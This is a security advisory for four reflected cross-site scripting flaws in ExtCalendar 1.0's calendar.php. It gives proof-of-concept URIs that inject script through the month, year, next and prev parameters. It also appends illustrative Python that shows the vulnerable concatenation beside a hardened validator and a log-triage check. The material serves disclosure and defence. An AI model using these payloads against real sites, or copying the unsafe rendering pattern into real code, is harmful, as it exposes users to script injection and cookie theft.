ExtCalendar Cross-Site Scripting Vulnerabilities
BID:17146
Info
| Bugtraq ID: | 17146 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 18 2006 12:00AM |
| Updated: | Mar 20 2006 09:24PM |
| Credit: | [email protected] is credited with discovery. |
| Vulnerable: | ExtCalendar ExtCalendar 1.0 |
| Not Vulnerable: | ExtCalendar ExtCalendar 2.0 |
Discussion
ExtCalendar is prone to four cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Exploit / POC
This issue can be exploited through a web client.
The following proof-of-concept URIs are available:
http://www.example.com/path/calendar.php?op=cal&month=3&year="><script>alert(/Soot/)</script>
http://www.example.com/path/calendar.php?op=cal&month="><script>alert(/Soot/)</script>&year=2006
http://www.example.com/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next="><script>alert(/Soot/)</script>
http://www.example.com/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next=2&prev="><script>alert(/Soot/)</script>
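All four proof-of-concept URIs inject through navigation parameters that calendar.php reflects into an HTML attribute, breaking out with `">`. The Python below is an added illustration, not ExtCalendar's own code (its source is not on this page): it reproduces the unsafe concatenation pattern beside a hardened renderer that only accepts in-range integers, plus a log-triage check for the same parameters. The numeric ranges and the link template are assumptions.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Proof-of-concept URI quoted in the advisory (www.example.com is a placeholder host).
POC_URI = ('http://www.example.com/path/calendar.php?op=cal&month=3&year='
           '"><script>alert(/Soot/)</script>')

# calendar.php navigation parameters the PoCs target. All are numeric by design,
# so an allow-list of in-range integers is the natural validator (ranges assumed).
NUMERIC_PARAMS = {"month": (1, 12), "year": (1970, 2100), "da": (1, 31),
                  "mo": (1, 12), "ye": (1970, 2100), "next": (0, 10**6),
                  "prev": (0, 10**6)}


def query_params(uri):
    """First value of each query parameter, percent-decoded."""
    return {k: v[0] for k, v in parse_qs(urlsplit(uri).query).items()}


def render_nav_link_unsafe(params):
    """The vulnerable pattern: raw request values dropped into an href attribute."""
    return ('<a href="calendar.php?op=cal&month=%s&year=%s">next</a>'
            % (params.get("month", ""), params.get("year", "")))


def render_nav_link_safe(params):
    """Hardened form: reject anything that is not an in-range integer, then
    HTML-escape (quotes included) before the value reaches an attribute."""
    clean = {}
    for name, (lo, hi) in NUMERIC_PARAMS.items():
        raw = params.get(name)
        if raw is None:
            continue
        if not re.fullmatch(r"\d{1,7}", raw) or not lo <= int(raw) <= hi:
            raise ValueError("rejected non-numeric %s parameter" % name)
        clean[name] = html.escape(raw, quote=True)
    return ('<a href="calendar.php?op=cal&month=%s&year=%s">next</a>'
            % (clean.get("month", "1"), clean.get("year", "1970")))


def suspicious_params(uri):
    """Log-triage helper: numeric calendar.php parameters whose value carries
    quote or tag characters (decoded a second time to catch double-encoding)."""
    if "calendar.php" not in urlsplit(uri).path:
        return []
    return sorted(name for name, val in query_params(uri).items()
                  if name in NUMERIC_PARAMS and re.search(r'["<>]', unquote(val)))
```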
Solution / Fix
Solution:
This issue is reportedly addressed in ExtCalendar 2.0. Symantec has not confirmed this fix. Affected users are advised to contact the vendor for further information.